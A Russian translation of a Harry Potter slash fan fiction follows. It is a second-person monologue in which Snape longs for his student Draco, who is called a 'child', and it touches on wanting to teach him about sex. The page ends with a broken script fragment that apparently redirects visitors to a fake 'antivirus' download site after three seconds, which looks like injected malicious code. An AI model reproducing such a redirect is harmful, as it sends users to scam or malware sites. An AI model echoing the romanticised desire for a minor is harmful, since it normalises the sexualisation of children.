История повторяется
History Repeats

Автор: paranoidkitten
Оригинал: www.snitchfiction.net
Перевод: Марси
Beta-reading: Мартышия Адамс
Рейтинг: PG, slash
Pairing: Северус/Драко
Автор разрешил размещать перевод данного фика на русскоязычных сайтах.

Не думай о нем. Ни в коем случае. Ты знаешь, что не должен этого делать. Ты знаешь, что подобные отношения между преподавателем и студентом запрещены. Ты годишься ему в отцы. Черт, ты знаешь его отца, и это еще хуже. Если бы Люциус узнал, что ты мечтаешь о его сыне, ему стало бы противно. И это мягко сказано.

Ты точно так же мечтал о Люциусе. Но это было давным-давно, и тех пор многое изменилось. Ты тоже изменился и понял наконец, что зло всегда есть зло, как бы привлекательно оно ни выглядело. Ты отдал бы жизнь за него, за то, чтобы все вернуть, но ты знаешь, что ничего вернуть нельзя. Он никогда не заботился ни о ком, кроме себя самого. Очевидно, Драко унаследовал все его черты, в том числе и эгоизм, но ты все еще не усвоил урок.

Потому что ты все еще надеешься. Надеешься, что Драко еще слишком молод, чтобы быть настолько испорченным. Надеешься, что, несмотря на его браваду, он - хороший ребенок.

Ребенок. Это проблема, не так ли? Он ребенок. Он слишком юн, чтобы ты мог мечтать о нем. Он юн, невинен, и, возможно, именно в этом его привлекательность: ты хочешь учить его. Не только Зельеварению - ты хочешь рассказать ему о жизни, о любви, о сексе; о добре и зле, о выборе, о сожалениях и надеждах.

Ты наблюдаешь за ним, когда он склоняется над книгой или котлом. Изредка он поднимает светлую голову, чтобы улыбнуться тебе или оскорбить кого-то из одноклассников. Нет никакой тайны в том, что он твой любимый студент, но он это заслужил. Ты оценил, как много и усердно Драко работает на твоих уроках. Ты знаешь, что он не уделяет так много времени остальным предметам, и другие преподаватели постоянно сетуют на то, что он никогда не выкладывается на их занятиях полностью. Но для тебя он это делает.

Ты знаешь, что это ничего не означает, или, по крайней мере, означает совсем не то, что тебе бы хотелось. Драко смотрит на тебя. Драко понимает, что вы с ним в чем-то схожи, и хорошо к тебе относится. Но в этом нет ничего романтического или сексуального. Ты, конечно, хочешь, чтобы было. Но нет. Он, вероятно, думает о тебе как о старике, чья молодость давным-давно прошла.

Ты снова думаешь о Люциусе, хотя и знаешь, что это тоже неправильно. Люциус женат. Люциусу всегда было наплевать на тебя. Ты лишь намекнул ему, а он стал насмехаться над тобой и дразнить, до тех пор, пока ты его не ударил. Возможно, это единственная причина, по которой он все еще тебя уважает.

Ты легко можешь представить, что и реакция Драко будет такой же. Отвращение, возмущение, и, наконец, насмешка... В конце концов, история повторяется. Но, может быть, еще есть шанс. Все еще есть надежда. Возможно, он не поступит так же, как отец.

Но ты видишь в нем Люциуса: во внешности, манерах, даже в том, что он так же издевается над другими учениками, как Люциус издевался над тобой. И ты знаешь, что ничего бы не вышло, даже если бы ты не был так стар, а он не был так молод, даже если бы ты не был профессором, а он не был бы твоим студентом…

Не думай о нем. Ни в коем случае.

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>